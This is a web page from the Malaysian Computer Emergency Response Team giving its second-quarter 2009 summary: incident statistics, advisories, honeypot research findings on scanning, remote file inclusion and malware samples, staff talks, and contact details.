Malaysian Computer Emergency Response Team

Services

Advisories Cyber999 Help Centre Malware Research Centre Incident Statistics

MyCERT Statistic

Reported Incidents based on General Incident Classification Statistics 2012

Help Centre

Reporting Channels

Definitions of Incidents

Cyber999 - Service Level Agreement

MyCERT Advisories

MyCERT Advisories, Alerts and Summaries for the year 2009

MS-224.062009: MyCERT 2nd Quarter 2009 Summary Report

29 June 2009

Introduction

This Quarterly summary provides an overview of activities carried out by MyCERT related to computer security incident handling and trends observed from the research network. The summary highlights statistics of categories of incidents handled by MyCERT in Q2 2009, security advisories released to MyCERT’s constituents, the Malaysian Internet users, and other activities carried out by MyCERT staff. Do take note that the statistics provided reflect only the total number of incidents handled by MyCERT and not elements such as monetary value or repercussion of the incidents. Computer security incidents handled by MyCERT are those that occur or originate within the Malaysian domain or IP space. MyCERT works closely with other local and global entities to resolve computer security incidents.

Incidents Trends Q2 2009

From April to June 2009, MyCERT, via its Cyber999 service, handled a total of 883 incidents. These incidents were referred to MyCERT by members in it’s constituency and security teams from abroad, in addition to MyCERT’s proactive monitoring efforts.

The following graph shows the total incidents handled by MyCERT in Q2 2009.

In Q2 2009, system intrusion and fraud recorded high number of incidents representing 54% and 16% of incidents handled respectively. System intrusion incidents are generally attributed to web defacement. MyCERT observed that the main cause of defacements were vulnerable web applications. Fraud incidents are mostly phishing sites of local and foreign institutions. In Q2 2009, MyCERT handled about 43 phishing sites and phishing emails with majority of phishing sites were targeting local brands. MyCERT handles both the source of the phishing emails as well as the removal of the phishing sites by the affected Internet Service Providers (ISPs). Under the classification of drones and malicious codes, in Q2 2009, MyCERT had handled 13% out of total incidents. Other examples of incidents within these categories are active botnet controller and hosting of malware or malware configuration files.

The following graph shows the breakdown of domains defaced in Q2 2009. Out of the 454 websites defaced in Q2 2009, 65% of them are those with a com and com.my extensions.Defacers generally target web applications that are prone to SQL injection or sites that are not secured.

Advisories and Alerts

In Q2 2009, MyCERT had issued a total of 16 advisories and alerts for its constituency. Most of the advisories in Q2 involved popular end user applications such as Adobe PDF Reader, Adobe Flash, Microsoft Office Power Point, Mozilla Firefox and Microsoft Internet Explorer. Attacker often compromise end users computers by exploiting vulnerabilities in users’ application. Generally, the attacker tricks the user in opening a specially crafted file (i.e. a pdf document) or web page.

Readers can visit the following URL on advisories and alerts released by MyCERT in 2009.

http://www.mycert.org.my/en/services/advisories/mycert/2009/main/index.html

CyberSecurity Malaysia Research Network

Apart from the Cyber999 service, MyCERT also observed activities on its research network and conduct analysis on internet threats and trends. The overall objectives of this initiative are as follow:

To observe the network for suspicious traffic simultaneously monitor for the occurrence of known malicious attacks.
To observe attacker behaviours in order to learn new techniques being deployed.
To determine the popular techniques that is currently being used as well as to confirm the continued use of old and well known attack techniques.
To compile and analyze sufficient relevant information of which the results can be used to alert the community at large to the possibility of imminent cyber attacks on local networks.

1. Network Activities

The following is a summary derived from MyCERT’s research network for Quarter 2, 2009. The research network contains no real production value and as such, traffic that comes to it is suspicious in nature.

As our research dominated by Web based honeypot and Windows based emulated services, most of the signatures are related to web based attacks and Windows based exploitation. Figure 1.0 showed the pie chart for network activities. For this quarter, we’re grouping all the scanning activities into single category of IDS signature. We still observed scanning activities which looking for port 5900 for VNC (Virtual Network Computing). VNC is a graphical desktop sharing system that uses the RFB protocol to remotely control another. The noisy of scanning activities contribute to the most of our statistic for Q2.

Figure 1.0 show top ten alerts generated from CyberSecurity Malaysia Research Network intrusion detection systems. More than 70% alert generated are related to port scanning which shows that this technique is used to search for a network host for open ports and most probably to find specific vulnerability exploit to launch real attack once the vulnerabilities have been found.

The chart also shows 20% alert are from WEB PHP Remote File Inclusion (RFI). The reason for high number of alert generated is due to a distributed deployment of a web component used to research on Remote File Inclusion (RFI) attacks. Generally, activities on port 22 are related to brute forcing, most of which are automated or carried out by compromised machines

2. Malware tracking

Software is considered malicious (malware) based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms, trojan horses, most rootkits, spyware, dishonest adware, crimeware and other malicious and unwanted software. Malware is not the same as defective software, that is, software that has a legitimate purpose but contains harmful bugs.

MyCERT has been collecting malware samples automatically since 2007. Out of total 7734 binaries collected in the first quarter of 2009, 760 are unique (based on MD5 hash). For the second quarter of 2009, we observed the number of malware collected is 9561. And sample that are unique (based on MD5 hash), we collected 672 sample. The malware samples collected are increasing while the unique malware collected is decreasing.

The figure 1.0 below is the distribution of the source attack to our research network grouped by country. The list of the countries above reflects the nature of the IP addresses coverage of our research network and the way infected computers scan for new targets. The statistic showed not much different compare to previous quarter.

By laying the graph into map, here we can see the the global distribution of binaries downloaded by sensors in the second quarter of 2009.

Attacker trying to spread the malware has actively used the malware sample called Virut during Q2 compare to Q1. Hence we observed more sample collected for Virut. Figure 3.0 show the malware variant scanned with multiple antivirus software. We’re using three free anti-virus software to identify our collected malware. Below are the top 10 malware classification based on 3 Anti-Virus software used by MyCERT. MyCERT proactively handled incidents related to malware hosting and escalated the relevant information to the respective parties such as ISPs and international Computer Security Incident Response Teams (CSIRTs)

3. RFI Tracking

In Q2 2009 MyCERT has detected more than 431,550 attempts of RFI attacks and recorded about 3652 unique domains used as drop sites. MyCERT has proactively handled these incidents and escalated the relevant information to the respective parties such as ISPs and international Computer Security Incident Response Teams (CSIRTs). The following figures 4.0 show the top source of attack and visualization of common names used in RFI scripts (figure 5.0)

Other Activities

MyCERT staff had been invited to conduct talks and training in various locations in Q2 2009. The following is a brief list of talks and training conducted by MyCERT in Q2 2009:

May 2009 - APWG Counter-eCrime Operations Summit (CeCOS III),Barcelona, Spain, Talk on Malaysia National Report and Case Study.
May 2009 – Update,F-Secure Tower,KL, Incident Handling and Threats.
May 2009 - MSC OSCON 2009, KL, Training on Practical Analysis With OSS Tools for Web Intrusion.
May 2009 –Internet Security Awareness, Brunei, Talk on Internet Security.
May 2009 – Seminar Keselamatan ICT, Pulau Pinang, Talk on IT Security.
June 2009 – Seminar ICT Kebangsaan, Putrajaya, Talk on Security Risk, How Safe is Safe.
June 2009 - MSC OSCON 2009, KL, Web Security: Are Your Web Servers Part of Botnet.

Conclusion

In Q2 2009, neither crisis nor outbreak was observed. Nevertheless, users and organizations are advised to always take measures to protect their systems and networks from threats. MyCERT encourages Malaysian Internet users to be constantly vigilant of the latest computer security threats.

MyCERT can be reached for assistance at:
Malaysia Computer Emergency Response Team (MyCERT)
E-mail: mycert@mycert.org.my
Cyber999 Hotline: 1 300 88 2999
Phone: (603) 8992 6969
Fax: (603) 8945 3442
Phone: 019-266 5850
SMS: Type CYBER999 report to 15888
http://www.mycert.org.my/

Please refer to MyCERT’s website for latest updates of this Quarterly Summary